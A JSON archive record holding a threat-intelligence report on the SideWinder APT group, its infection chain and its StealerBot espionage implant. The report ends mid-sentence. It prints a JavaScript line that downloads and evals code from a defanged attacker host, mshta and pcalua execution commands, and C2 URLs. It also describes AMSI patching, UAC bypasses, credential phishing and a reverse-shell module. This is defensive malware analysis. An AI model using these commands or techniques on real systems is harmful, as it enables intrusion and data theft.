{
	"id": "eb97cac9-a8da-45dd-976b-eb3e24f1e795",
	"created_at": "2026-04-06T00:22:22.651846Z",
	"updated_at": "2026-04-10T03:37:20.372209Z",
	"deleted_at": null,
	"sha1_hash": "cd734a8f8f6349cf28a379073393fcb8747f4b22",
	"title": "Beyond the Surface: the evolution and expansion of the SideWinder APT group",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1426770,
	"plain_text": "Beyond the Surface: the evolution and expansion of the SideWinder APT\r\ngroup\r\nBy Giampaolo Dedola\r\nPublished: 2024-10-15 · Archived: 2026-04-05 15:39:45 UTC\r\nSideWinder, aka T-APT-04 or RattleSnake, is one of the most prolific APT groups that began its activities in 2012 and was\r\nfirst publicly mentioned by us in 2018. Over the years, the group has launched attacks against high-profile entities in South\r\nand Southeast Asia. Its primary targets have been military and government entities in Pakistan, Sri Lanka, China and Nepal.\r\nOver the years, SideWinder has carried out an impressive number of attacks and its activities have been extensively\r\ndescribed in various analyses and reports published by different researchers and vendors (for example, here, here and here),\r\none of the latest of which was released at the end of July 2024. The group may be perceived as a low-skilled actor due to the\r\nuse of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true\r\ncapabilities only become apparent when you carefully examine the details of their operations.\r\nDespite years of observation and study, knowledge of their post-compromise activities remains limited.\r\nDuring our investigation, we observed new waves of attacks that showed a significant expansion of the group’s activities.\r\nThe attacks began to impact high-profile entities and strategic infrastructures in the Middle East and Africa, and we also\r\ndiscovered a previously unknown post-exploitation toolkit called “StealerBot”, an advanced modular implant designed\r\nspecifically for espionage activities that we currently believe is the main post-exploitation tool used by SideWinder on\r\ntargets of interest.\r\nSideWinder’s most recent campaign schema\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 1 of 26\n\nInfection vectors\r\nThe SideWinder attack chain typically starts with a spear-phishing email with an 
attachment, usually a Microsoft OOXML\r\ndocument (DOCX or XLSX) or a ZIP archive, which in turn contains a malicious LNK file. The document or LNK file\r\nstarts a multi-stage infection chain with various JavaScript and .NET downloaders, which ends with the installation of the\r\nStealerBot espionage tool.\r\nThe documents often contain information obtained from public websites, which is used to lure the victim into opening the\r\nfile and believing it to be legitimate. For example, the file in the image contains data downloaded from the following URL:\r\nhttps://nasc.org.np/news/closing-ceremony-training-program-financial-management-and-audit-officials-nepal-oil\r\nSnippet of the file 71F11A359243F382779E209687496EE2, “Nepal Oil Corporation (NOC).docx”\r\nThe contents of the file are selected specifically for the target and changed depending on the target’s country.\r\nAll the documents use the remote template injection technique to download an RTF file that is stored on a remote server\r\ncontrolled by the attacker.\r\nRTF exploit\r\nRTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a memory corruption vulnerability in\r\nMicrosoft Office software.\r\nThe attacker embedded shellcode designed to execute JavaScript code using the “RunHTMLApplication” function available\r\nin the “mshtml.dll” Windows library.\r\nThe shellcode uses different tricks to avoid sandboxes and complicate analysis.\r\nIt uses GlobalMemoryStatusEx to determine the amount of installed RAM. If the size is less than 2GB, it terminates\r\nexecution.\r\nIt uses the CPUID instruction to obtain information about the processor manufacturer. If the CPU is not from Intel or\r\nAMD, it terminates execution.\r\nIt attempts to load the “dotnetlogger32.dll” library. 
If the file is present on the system, it terminates execution.\r\nThe malware uses different strings to load libraries and functions required for execution. These strings are truncated and the\r\nmissing part is added at runtime by patching the bytes. The strings are also mixed inside the code, which is adapted to skip\r\nthem and jump to valid instructions during execution, to make analysis more difficult.\r\nThe strings are passed as arguments to a function that performs the same action as “GetProcAddress”: it gets the address of\r\nan exported function. To do this, it receives two arguments: a base address of a library that exports the function, and the\r\nname of the exported function.\r\nThe first argument is passed with the standard push instruction, which loads the library address to the stack. The second\r\nargument is passed indirectly using a CALL instruction.\r\nPassing necessary arguments\r\nThe loaded functions are then used to perform the following actions:\r\n1. Load the “mshtml.dll” library and get the pointer to the “RunHTMLApplication” function.\r\n2. Get a pointer to the current command line using the “GetCommandLineW” function.\r\n3. Decrypt a script written in JavaScript that is embedded in the shellcode and encoded with XOR using “0x12” as the\r\nkey.\r\n4. Overwrite the current process command line with the decoded JavaScript.\r\n5. 
Call the “RunHTMLApplication” function, which will execute the code specified in the process command line.\r\nThe loaded JavaScript downloads and executes additional script code from a remote website.\r\njavascript:eval(\"v=ActiveXObject;x=new v(\\\"WinHttp.WinHttpRequest.5.1\\\");x.open(\\\"GET\\\",\r\n\\\"hxxps://mofa-gov-sa.direct888[.]net/015094_consulategz\\\",false);x.Send();eval(x.ResponseText);window.close()\")\r\nInitial infection LNK\r\nDuring the investigation we also observed another infection vector delivered via a spear-phishing email with a ZIP file\r\nattached. The ZIP archive is distributed with names intended to trick the victim into opening the file. The attacker frequently\r\nuses names that refer to important events such as the Hajj, the annual Islamic pilgrimage to Mecca.\r\nThe archive usually contains an LNK file with the same name as the archive. For example:\r\nZIP filename LNK filename\r\nmoavineen-e-hujjaj hajj-2024.zip MOAVINEEN-E-HUJJAJ HAJJ-2024.docx.lnk\r\nNIMA Invitation.zip NIMA Invitation.doc.lnk\r\nSpecial Envoy Speech at NCA.zip Special Envoy Speech at NCA.jpg .lnk\r\nදිනදි සං ශෝ ධන කර ගැ නිම.zip (Amending dates) දිනදි සං ශෝ ධන කර ගැ නිම .lnk\r\noffer letter.zip offer letter.docx.lnk\r\nThe LNK file points to the “mshta.exe” utility, which is used to execute JavaScript code hosted on a malicious website\r\ncontrolled by the attacker.\r\nBelow are the configuration values extracted from one of these LNK files:\r\nLocal Base Path : C:\\Windows\\System32\\sshtw.png\r\nDescription : MOAVINEEN-E-HUJJAJ HAJJ-2024.docx\r\nRelative Path : ..\\..\\..\\Windows\\System32\\calca.exe\r\nLink Target: C:\\Windows\\System32\\mshta.exe\r\nWorking Directory : C:\\Windows\\System32\r\nCommand Line Arguments : \"hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0\"\r\nIcon File Name : %systemroot%\\System32\\moricons.dll\r\nMachine ID : desktop-84bs21b\r\nDownloader module\r\nThe 
RTF exploits and LNK files execute the same JavaScript malware. This script decodes an embedded payload that is\r\nstored as a base64-encoded string. The payload is a .NET library named “App.dll”, which is then invoked by the script.\r\nJavaScript loader (beautified)\r\nApp.dll is a simple downloader or dropper configured to retrieve another .NET payload from a remote URL passed as an\r\nargument by the JavaScript, or to decode and execute another payload passed as an argument.\r\nThe library should be executed by invoking the “Programs.Work()” method, which can receive three arguments as input. We\r\nnamed the inputs as follows:\r\nArgument Argument description\r\nC2_URL An optional argument that can be used to pass a URL used to download a remote payload.\r\nPayload_filename\r\nAn optional argument that can be used together with the “Payload_Data” argument to create a file\r\non the local filesystem that will contain the dropped payload.\r\nPayload_data\r\nAn optional argument that can be used to pass an encoded payload that should be dropped on the\r\nlocal filesystem.\r\nApp.dll starts by collecting information about installed endpoint security products. In particular, Avast and AVG solutions\r\nare of interest to the malware. The collected data are sent to the C2. Then, if the “Payload_data” argument is not “Null”, it\r\ndecodes and decompresses the data using base64 and Gzip. 
The resulting payload is stored in the user’s Temp directory\r\nusing the filename specified in the “Payload_filename” argument.\r\nIf Avast or AVG solutions are installed, the content of the dropped file is executed with the following command:\r\nmshta.exe \"javascript:WshShell = new\r\nActiveXObject(\"WScript.Shell\");WshShell.Run(\"%TEMP%\\%Payload_filename%\", 1,\r\nfalse);window.close()\r\nOtherwise, it will be executed with the following command:\r\npcalua.exe -a %TEMP%\\%Payload_filename%\r\nIf the attacker provides a C2_URL, the malware attempts to download another payload from the specified remote URL. The\r\nobtained data is decoded with an XOR algorithm using the first 32 bytes of the received payload as the key.\r\nThe resulting file should be .NET malware named “ModuleInstaller.dll”.\r\nModuleInstaller\r\nThe ModuleInstaller malware is a downloader used to deploy the Trojan used to maintain a foothold on compromised\r\nmachines, a malicious component we dubbed “Backdoor loader module”. We have been observing this specific component\r\nsince 2020, but previously we only described it in our private intelligence reports.\r\nModuleInstaller was designed to drop at least four files: a legitimate and signed application used to sideload a malicious\r\nlibrary, a .config manifest embedded in the program as a resource and required by the next stage to properly load additional\r\nmodules, a malicious library, and an encrypted payload. 
We observed various combinations of the dropped files, the most\r\ncommon being:\r\n%Malware Directory%\\vssvc.exe\r\n%Malware Directory%\\%encryptedfile%\r\n%Malware Directory%\\vsstrace.dll\r\n%Malware Directory%\\vssvc.exe.config\r\nor\r\n%Malware Directory%\\WorkFolders.exe\r\n%Malware Directory%\\%encryptedfile%\r\n%Malware Directory%\\propsys.dll\r\n%Malware Directory%\\WorkFolders.exe.config\r\nModuleInstaller embeds the following resources:\r\nResource name MD5 Description\r\nInterop_TaskScheduler_x64 95a49406abce52a25f0761f92166c18a Interop.TaskScheduler.dll for 64-bit systems used to create Windows Scheduled Tasks\r\nInterop_TaskScheduler_x86 dfe750747517747afa2cee76f2a0f8e4 Interop.TaskScheduler.dll for 32-bit systems used to create Windows Scheduled Tasks\r\nmanifest d3136d7151f60ec41a370f4743c2983b XML manifest dropped as .config file\r\nPeLauncher 22e3a5970ae84c5f68b98f3b19dd980b .NET program not used in the code\r\nshellcode 32fc462f80b44013caeada725db5a2d1 Shellcode used to load libraries, which exports a function named “Start”\r\nStealerBot_CppInstaller a107f27e7e9bac7c38e7778d661b78ac C++ library used to download two malicious libraries and create persistence points\r\nThe downloader is configured to receive a URL as input and parse it to extract a specific value from a variable. The\r\nretrieved value is then compared with a list of string values that appear to be substrings of well-known endpoint security\r\nsolutions:\r\nPattern Endpoint Security Solution\r\nq=apn Unknown\r\naspers Kaspersky\r\nAfree McAfee (misspelled)\r\navast Avast\r\navg AVG\r\norton Norton\r\n360 360 Total Security\r\navir Avira\r\nModuleInstaller supports six infection routines, which differ in the techniques used to execute “Backdoor loader module” or\r\ndownload the components, but share similarities in the main logic. 
Some of these routines also include tricks to remove\r\nevidence, while others don’t. The malware only runs one specific routine chosen according to the value received as an\r\nargument and the value of an internal configuration embedded in the code.\r\nRoutine Conditions\r\nInfection Routine 1 Executed when substring “q=apn” is detected.\r\nInfection Routine 2 Executed when a specific byte of the internal config is equal to “1”.\r\nInfection Routine 3 Executed when the substring “360” is detected.\r\nInfection Routine 4 Executed when the substring “avast” or “avir” is detected.\r\nInfection Routine 5 Executed when the substring “aspers” or “Afree” is detected.\r\nInfection Routine 6 Default case. Executed when all the other conditions are not satisfied.\r\nAll the routines collect information about the compromised system. Specifically, they collect:\r\nCurrent username;\r\nProcessor names and number of cores;\r\nPhysical disk name and size;\r\nThe values of the TotalVirtualMemorySize and TotalVisibleMemorySize properties;\r\nCurrent hostname;\r\nLocal IP address;\r\nInstalled OS;\r\nArchitecture.\r\nThe collected data are then encoded in base64 and concatenated with a C2 URL embedded in the code, inside a variable\r\nnamed “data”.\r\nhxxps://dynamic.nactagovpk[.]org/735e3a_download?data=\u003cstoleninfo\u003e\r\nThe malware has several C2 URLs embedded in the code, all of them encoded with base64 using a custom alphabet:\r\nC2_URL_1 = hxxps://dynamic.nactagovpk[.]org/735e3a_download\r\nC2_URL_2 = hxxps://dynamic.nactagovpk[.]org/0df7b2_download\r\nC2_URL_3 = hxxps://dynamic.nactagovpk[.]org/27419a_download\r\nC2_URL_4 = hxxps://dynamic.nactagovpk[.]org/ef1c4f_download\r\nThe malware sends the collected information to one of the C2 servers selected according to the specific infection routine.\r\nThe server response should be a payload with various configuration values.\r\nThe set of values may vary 
depending on the infection routine. The malware parses the received values and assigns them to\r\nlocal variables. In most cases the variable names cannot be obtained from the malware code. However, in one particular\r\ninfection routine the attacker used debug strings that allowed us to obtain most of these names. The table below contains the\r\nfull list of possible configuration values.\r\nVariable name Description\r\nMALWARE_DIRECTORY Directory path where all the malicious files are stored.\r\nLOAD_DLL_URL_X64 URL used to download the malicious library for 64-bit systems.\r\nLOAD_DLL_URL_X86 URL used to download the malicious library for 32-bit systems.\r\nLOAD_DLL_URL URL used to download the malicious library. Some infection routines do not check the\r\narchitecture.\r\nAPP_DLL_URL URL used to download the encrypted payload.\r\nHIJACK_EXE_URL URL used to download the legitimate application used to sideload the malicious library.\r\nRUN_KEY Name of the Windows Registry value that will be created to maintain persistence.\r\nHIJACK_EXE_NAME Name of the legitimate application.\r\nLOAD_DLL_NAME Name of the malicious library.\r\nMOD_LOAD_DLL_URL URL used to download an unknown library that is saved in the\r\nMALWARE_DIRECTORY as “IPHelper.dll”.\r\nThe payload is XORed twice. The keys are the first 32 bytes at the beginning of the payload.\r\nDuring execution, the malware logs the current infection status by sending GET requests to the C2. The analyzed sample\r\nused C2_URL_4 for this purpose. The request includes at least one variable named “data”, whose value indicates the\r\ninfection status.\r\nVariable Description\r\n?data=1 Downloads completed.\r\n?data=2 Persistence point created.\r\n?data=3\u0026m=str Error. 
It also contains a variable “m” with information about the error.\r\n?data=4 Infection completed, but the next stage is not running.\r\n?data=5 Infection completed and the next stage is running.\r\nThe technique used to maintain persistence varies according to the infection routine selected by the malware, but generally\r\nrelies on the creation of new registry values under the HKCU Run key or the creation of Windows Scheduled Tasks.\r\nFor example:\r\nRegKey: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegValue: xcschemer (MALWARE_DIRECTORY)\r\nRegValueData: %AppData%\\xcschemer\\vssvc.exe (HIJACK_EXE_PATH)\r\nBackdoor loader module\r\nThe infection scheme described in the previous paragraph results in the installation of a malicious library that is sideloaded\r\nusing the legitimate and digitally signed application. The library acts as a loader that retrieves an encrypted payload dropped\r\nby ModuleInstaller, decrypts it and loads it in memory.\r\nThe Backdoor loader module has been observed since 2020; we covered it in our private APT reports. It has remained\r\nalmost the same over the years. It was recently updated by the attacker, but the main difference is that old variants are\r\nconfigured to load the encrypted file using a specific filename embedded in the program, and the latest variants were\r\ndesigned to enumerate all the files in the current directory and load those without an extension.\r\nThe library is usually highly obfuscated using the Control Flow Flattening technique. In addition, the strings, method names,\r\nand resource names are randomly modified with long strings, which makes the decoded code difficult to analyze. Moreover,\r\nsome relevant strings are stored inside a resource embedded in the program and encrypted with an XOR layer and Triple\r\nDES.\r\nThe malware also contains anti-sandbox techniques. It takes the current date and time and puts the thread to sleep for 100\r\nseconds. 
Sandboxes usually ignore the sleeping functions because they are often used by malware to generate long delays in\r\nexecution and avoid detection. Upon awakening, the malware retrieves again the current time and date and checks if the\r\nelapsed time is less than 90.5 seconds. If the condition is true, it terminates the execution.\r\nThe malware also attempts to avoid detection by patching the AmsiScanBuffer function in “amsi.dll” (Windows\r\nAntimalware Scan Interface). Specifically, it loads the “amsi.dll” library and parses the export directory to find the\r\n“AmsiScanBuffer” function. In this function, it changes the memory protection flags to modify instructions at RVA 0x337D\r\nto always return error code 0x80070057 (E_INVALIDARG – Invalid Argument). This change forces the “Amsi” protection\r\nto always return a scan result equal to 0, which is usually interpreted as AMSI_RESULT_CLEAN.\r\nAmsiScanBuffer before patching\r\nAmsiScanBuffer after patching\r\nThe patched code is only one byte in size: the malware changes 0x74, which corresponds to the JZ (Jump if zero)\r\ninstruction, to 0x75, which corresponds to JNZ (Jump if not zero). The jump should be made when the buffer provided as\r\ninput to the AmsiScanBuffer function is invalid. With the modification, the jump will be made for all valid buffers.\r\nAfter patching AmsiScanBuffer, the malware performs a startup operation to achieve its main goal, which is to load another\r\npayload from the encrypted file. First, it enumerates files in the current directory and tries to find a file without the character\r\n‘.’ in the file name (i.e., without an extension). Then, if the file is found, it uses the first 16 bytes at the beginning of the file\r\nas the key and decodes the rest of the data using the XOR algorithm. 
Finally, it loads the data as a .NET assembly and\r\ninvokes the “Program.ctor” method.\r\nStealerBot\r\nStealerBot is a name assigned by the attacker to a modular implant developed with .NET to perform espionage activities. We\r\nnever observed any of the implant components on the filesystem. They are loaded into memory by the Backdoor loader\r\nmodule. Prior to being loaded, the binary is stored in an encrypted file.\r\nThe implant consists of different modules loaded by the main “Orchestrator”, which is responsible for communicating with\r\nthe C2 and executing and managing the plugins. During the investigation, we discovered several plugins that were uploaded\r\non compromised victims and were used to:\r\nInstall additional malware;\r\nCapture screenshots;\r\nLog keystrokes;\r\nSteal passwords from browsers;\r\nIntercept RDP credentials;\r\nSteal files;\r\nStart reverse shell;\r\nPhish Windows credentials;\r\nEscalate privileges bypassing UAC.\r\nModule IDs are included both in modules and in an encrypted configuration file. The Orchestrator uses them to manage the\r\ncomponents. It shares messages/commands with the modules, and can handle specific messages to kill or remove modules\r\nwith a particular ID.\r\nModule ID Description\r\n0xca Keylogger\r\n0xcb Live Console\r\n0xd0 Screenshot Grabber\r\n0xd4 File Stealer\r\n0xd6 UACBypass\r\n0xe0 RDP Credential Stealer\r\n0xe1 Token Grabber\r\n?? Credential Phisher\r\nStealerBot Orchestrator\r\nThe Orchestrator is usually loaded by the Backdoor loader module and is responsible for communicating with the C2 server,\r\nand executing and managing plugins. It periodically connects to two URLs to download modules provided by the attacker\r\nand upload files with stolen information. 
It also exchanges messages with the loaded module that can be used to provide or\r\nmodify configuration properties and unload specific components from the memory.\r\nOnce loaded into memory, the malware decodes a resource embedded in the Orchestrator called “Default”. The resource\r\ncontains a configuration file with the following structure:\r\nParameter Parameter type Description\r\nConfig path String Location used to store the configuration file after first execution\r\nData directory String Directory where the plugins store the output files that will be uploaded to\r\nthe remote C2\r\nC2 Modules String URL used to communicate with C2 server and retrieve additional plugins\r\nC2 Gateway String URL used to upload files generated by modules\r\nC2 Modules Sleeptime Integer Sleep time between communications with “C2 Modules”\r\nC2 Gateway Sleeptime Integer Sleep time between communications with “C2 Gateway”\r\nRSA_Key String RSA key used to encrypt communication with the C2 server\r\nNumber of plugins Integer Number of plugins embedded in the configuration\r\nModules Array Array which contains the modules\r\nThe configuration can embed multiple modules. By default, the array is usually empty, but after initial execution, the\r\nmalware creates a copy of the configuration in a local file and keeps it updated with information retrieved from the C2\r\nserver.\r\nAfter parsing the configuration, the malware loads all the modules specified in the file. It then launches two threads to\r\ncommunicate with the remote C2 server. The first thread is used to communicate with the first URL that we dubbed “C2\r\nModules”, which is used to obtain new modules. The second thread is used to communicate with the URL we called “C2\r\nGateway”, which is used to upload the data generated by the modules.\r\nThe malware communicates with the C2 Modules server using GET requests. 
Before sending the request, it adds an “x”\r\nvalue that contains the list of modules already loaded by the agent.\r\n\u0026x[moduleId_1,moduleId_2,moduleId_3,etc.]\"\r\nThe server responds with a message composed of two parts, the header and the payload. Each part has a specific structure\r\nwith different information:\r\nMessage structure\r\nEach message is digitally signed with the RSA private key owned by the server-side attacker, and the signature is stored in\r\nthe “rgbSignature” value. The Orchestrator uses the “RSACryptoServiceProvider.VerifyHash” method to verify that the\r\nprovided digital signature is valid.\r\nThe header is encoded with the same XOR algorithm used to encode or decode the configuration file. The payload is\r\ncompressed using Gzip and encrypted using AES. The header contains the information needed to identify the module,\r\ndecrypt the payload, and verify the received data.\r\nWhen the module is loaded, the Orchestrator invokes the module main method, passing two arguments: the module ID and a\r\npipe handle. The pipe is used to maintain communication between the module and the Orchestrator.\r\nThe modules can send various messages to the Orchestrator to get or modify the configuration, send log messages, and\r\nterminate module execution. 
The messages function like commands, have a specific ID, and can include arguments.\r\nThe first byte of the message is its ID, which defines the request type:\r\nMessage ID Description\r\n0 Get settings: the Orchestrator creates a copy of the current configuration and sends it to the module.\r\n1 Update config: the module provides a new configuration and the Orchestrator updates the current\r\nconfiguration values and stores them in the local file.\r\n2 Unload current module: the Orchestrator should unload the current module from the memory and close\r\nthe related pipes.\r\n3 Unload module by ID: the Orchestrator should unload a module with the ID specified in the received\r\nrequest.\r\n4 Remove startup: the Orchestrator should remove a module from the local configuration. The module ID\r\nis specified in the received request.\r\n5 Remove current module from the configuration: the Orchestrator should remove the current module\r\nID from the local configuration.\r\n6 Terminate current thread: the Orchestrator stops timers, pipes and removes the current module from\r\nthe current list of modules.\r\n7 Save log message: the Orchestrator saves a log message using the current module ID.\r\n8 Save log message: the Orchestrator saves a log message using the specified module ID.\r\n9 Get output folder configuration.\r\n10 Get C2 Modules URL: the Orchestrator shares the current C2 Modules URL with the module.\r\n11 Get C2 Gateway URL: the Orchestrator shares the current C2 Gateway URL with the module.\r\n12 Get RSA_Key public key.\r\nModules\r\nKeylogger\r\nThis module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and\r\nmonitor low-level keyboard and mouse input events. 
The malware can log keystrokes, mouse events, Windows clipboard\r\ncontents, and the title of the currently active window.\r\nScreenshot Grabber\r\nThis module periodically grabs screenshots of the primary screen.\r\nFile Stealer\r\nThe File Stealer module collects files from specific directories. It also scans removable drives to steal files with specific\r\nextensions. By default, the list of extensions is as follows:\r\n.ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf\r\nBased on these values, we can conclude that this tool was developed to perform espionage activities by collecting files that\r\nusually contain sensitive information, such as Microsoft Office documents. It also searches for PPK files, which is the\r\nextension of files created by PuTTY to store private keys. PuTTY is an SSH and Telnet client commonly used on Windows\r\nOS to access remote systems.\r\nThe stolen data also includes information about the local drive and file attributes.\r\nSnippet of code with the list of information collected by the File Stealer module\r\nLive Console\r\nThis library is configured to execute arbitrary commands on the compromised system. It can be used as a passive backdoor,\r\nlistening to the loopback interface, or as a reverse shell, connecting to the C2 to receive commands. 
The library can also\r\nprocess custom commands that provide the following capabilities:\r\nKill the module itself or its child processes;\r\nDownload additional files to compromised systems;\r\nAdd Windows Defender exclusions;\r\nInfect other users on the local system (requires high privileges);\r\nDownload and execute remote HTML applications;\r\nLoad arbitrary modules and extend malware capabilities.\r\nUnlike the other modules, Live Console communicates directly with a C2 whose address is embedded in the module’s code.\r\nBy default, the malware starts a new “cmd.exe” process, forwards data received from the attacker to its standard input, and\r\nforwards the process output or error pipeline to the attacker.\r\nIf the infected OS is recent, i.e., Windows 10 build version greater than or equal to “17763”, the malware creates a\r\npseudoconsole to launch “cmd.exe”. Otherwise, it launches the same application using the “Process” class specified in\r\n“System.Diagnostics”.\r\nBefore forwarding the command to the console, the malware checks if the first byte of the received data has a specific value\r\nthat indicates the presence of a custom command. Below is a list of these values (command IDs) with descriptions of the\r\ncommands they identify.\r\nWindows build Command ID Description\r\n\u003c 17763 3 Kill all child processes\r\n\u003c 17763 4 Kill the current module. Sends the message ID “2” to the Orchestrator to unload the\r\nmodule itself.\r\n\u003c 17763 16 Upload file to the infected system\r\n\u003e= 17763 1 Infect current logged-in user\r\n\u003e= 17763 2 Get current logged-in user\r\n\u003e= 17763 3 Download and execute a remote HTML application\r\n\u003e= 17763 4 Add directories to AV exclusions\r\n\u003e= 17763 5 Load a plugin\r\nMost of the commands are self-explanatory. 
We’d like to add a few words on the command with ID “1”, which is used to\r\ninfect other users on the same system whose profile is still “clean”. The malware infects the user by creating a copy of the\r\nsamples in the target user’s directory and creates a new registry value to ensure persistence.\r\nThis command is interesting because in the case of a specific error, the bot replies with the following message:\r\nInfected User is already logged in, use install dynx command from stealer bot\r\nfor installation\r\nCurrently, we don’t know what the dynx command represents, but the name “stealer bot” in this message and the name of\r\nthe resource embedded in the “ModuleInstaller”, “StealerBot_CppInstaller”, led us to conclude that the attacker named this\r\nmalware StealerBot.\r\nRDP Credential Stealer\r\nThis module consists of different components: a .NET library, shellcode, and a C++ library. It monitors running processes\r\nand injects malicious code into “mstsc.exe” to steal RDP credentials.\r\nmstsc.exe GUI\r\nMstsc.exe is the “Microsoft Terminal Service Client” process, which is the default RDP client on Windows. The malware\r\nmonitors the creation or termination of processes with the name “mstsc.exe”. When a new creation event is detected the\r\nmalware creates a new pipe with the static name “c63hh148d7c9437caa0f5850256ad32c” and injects malicious code into\r\nthe new process memory.\r\nThe injected code consists of different payloads that are embedded in the module as resources. The payloads are selected at\r\nruntime according to the system architecture, and merged before injection. The injected code is a shellcode that loads\r\nanother malicious library called “mscorlib”, written in C++ to steal RDP credentials by hooking specific functions of the\r\nWindows library “SspiCli.dll”. The library code appears to be based on open-source projects available on GitHub. 
It uses the Microsoft Detours Package to add or remove the hooks to the following functions:\r\nSspiPrepareForCredRead;\r\nCryptProtectMemory;\r\nCredIsMarshaledCredentialW.\r\nThe three functions are hooked to obtain the server name, password, and username, respectively. The stolen data are sent to the main module using the previously created pipe named “c63hh148d7c9437caa0f5850256ad32c”.\r\nToken Grabber\r\nThe module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services (Gmail, Google Drive, etc.). It has many code dependencies and starts by loading additional legitimate and signed libraries whose functions it uses. These libraries are not present on the compromised system by default, so the malware has to drop and load them to function properly.\r\nLibrary | Hash | Description\r\nNewtonsoft.Json | 52a7a3100310400e4655fb6cf204f024 | A popular high-performance JSON framework for .NET\r\nSystem.Data.SQLite | fcb2bc2caf7456cd9c2ffab633c1aa0b | An ADO.NET provider for SQLite\r\nSQLite_Interop_x64.dll | 1b0114d4720af20f225e2fbd653cd296 | A library for 64-bit architectures required by System.Data.SQLite to work properly\r\nSQLite_Interop_x86.dll | f72f57aa894f7efbef7574a9e853406d | A library for 32-bit architectures required by System.Data.SQLite to work properly\r\nCredential Phisher\r\nThis module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the victim.\r\nPhishing prompt\r\nSimilar to the RDP Credential Stealer, the malware creates a new pipe (“a21hg56ue2c2365cba1g9840256ad31c”) and injects malicious shellcode into a targeted process, in this case “explorer.exe”. 
The shellcode loads a malicious library called “credsphisher.dll”, which uses the Windows function “CredUIPromptForWindowsCredentialsW” to display a phishing prompt to the current user and trick the victim into entering their Windows credentials.\r\nWhen the user enters the credentials, the malware uses the “LogonUserW” function to check that the username and password provided are correct. If the user enters incorrect credentials, the malware continues to display the prompt until it receives a valid password. Finally, upon successful credential validation, the malware writes the computer hostname, username and password to the previously created pipe named “a21hg56ue2c2365cba1g9840256ad31c”.\r\nUACBypass\r\nThis module is a .NET library designed to bypass UAC and run malicious code with high privileges.\r\nThe library can achieve its goal using different bypass techniques, selected according to the Windows version and the security solution installed on the infected machine. The malware embeds various resources containing different payloads used during malware execution.\r\nResource | Hash | Description\r\nCOMUacBypass | 7f357621ba88a2a52b8146492364b6e0 | Library used to bypass UAC by abusing the IElevatedFactoryServer COM object\r\nmanifest | d3136d7151f60ec41a370f4743c2983b | XML manifest\r\nModule | b0f0c29f4143605d5f958eba664cc295 | Malicious library used to download additional malware\r\nReflectiveDllLoader | f492b2d5431985078b85c78661e20c09 | Shellcode to run libraries in memory\r\nVmComputeAgent | ba2914b59c7ae08c346fc5a984dcc219 | Program used for the Slui UAC bypass technique\r\nVmComputeAgent_exe | d3136d7151f60ec41a370f4743c2983b | XML manifest\r\nBefore starting its execution, the malware checks certain conditions on the system, namely that UAC elevation doesn’t require admin credentials and that the infected user belongs to the ‘Administrator’ group. 
If both conditions are met, the malware checks the Windows version and drops some artifacts according to the obtained values.\r\nWindows Server or Windows NT 6:\r\nDropped file | Content\r\n%Temp%\\%TempFile% | Copy of resource named “Module”\r\n%localappdata%\\Microsoft\\rundll32.exe | Copy of the legitimate program “%systemroot%\\System32\\rundll32.exe”\r\n%localappdata%\\Microsoft\\rundll32.exe.config | Copy of resource named “manifest”\r\nOther Windows versions:\r\nDropped file | Content\r\n%localappdata%\\Microsoft\\devobj.dll | Copy of resource named “Module”\r\n%localappdata%\\Microsoft\\rdpclip.exe | Copy of the legitimate program “%systemroot%\\System32\\rdpclip.exe”\r\nThe main goal of this component is to execute the resource named “Module”, which is a downloader, with high privileges.\r\nThe malware tries to use different UAC bypass techniques, which are selected according to the installed security solution.\r\nBy default, it tries to abuse the CMSTP (Windows Connection Manager Profile Installer) program. This legitimate program is abused with a technique discovered in 2017, where the attacker can pass a custom profile to execute arbitrary commands with high privilege. The default bypass technique is used on all systems except those protected by Kaspersky or 360 Total Security.\r\nIf these security solutions are detected, the malware attempts to use a more recent UAC bypass technique discovered in 2022, which abuses the “IElevatedFactoryServer” COM object.\r\nIn this case, the malware injects malicious shellcode into “explorer.exe”. The shellcode loads and executes a malicious library that was stored in the resource named “COMUacBypass”. 
The library uses the “IElevatedFactoryServer” COM object to register a new Windows task with the highest privileges, allowing the attacker to run the dropped payload with elevated privileges.\r\nDuring the static analysis of the “UACBypass” module we noticed the presence of code that is never called or executed. Specifically, we noticed a method named “KasperskyUACBypass” that implements another bypass technique, probably used in the past when the system was protected by Kaspersky anti-malware software. The method implements a bypass technique that abuses the legitimate Windows program slui.exe. This program is used to activate and register the operating system with a valid product key, but is prone to a file handler hijacking weakness. The hijacking technique was described in 2020 and is based on the modification of specific Windows registry keys. Based on the created values, we believe the attacker based their code on a proof of concept available on GitHub.\r\nThe module still includes two resources that are used exclusively by this code:\r\nVmComputeAgent\r\nVmComputeAgent_exe\r\nThe first is a very simple program, packed with ConfuserEx, which starts a new process, “%systemroot%\\System32\\slui.exe”, as administrator.\r\nThe second is an XML manifest.\r\nDownloader\r\nThe library is a downloader developed in C++ that attempts to retrieve three payloads using different URLs.\r\nhxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111?name=inpl64\r\nhxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4d?name=stg64\r\nhxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955?name=rflr\r\nUnfortunately, we were not able to get a valid response from the server, but considering the “name” variable inside the URL and the logic of the various components 
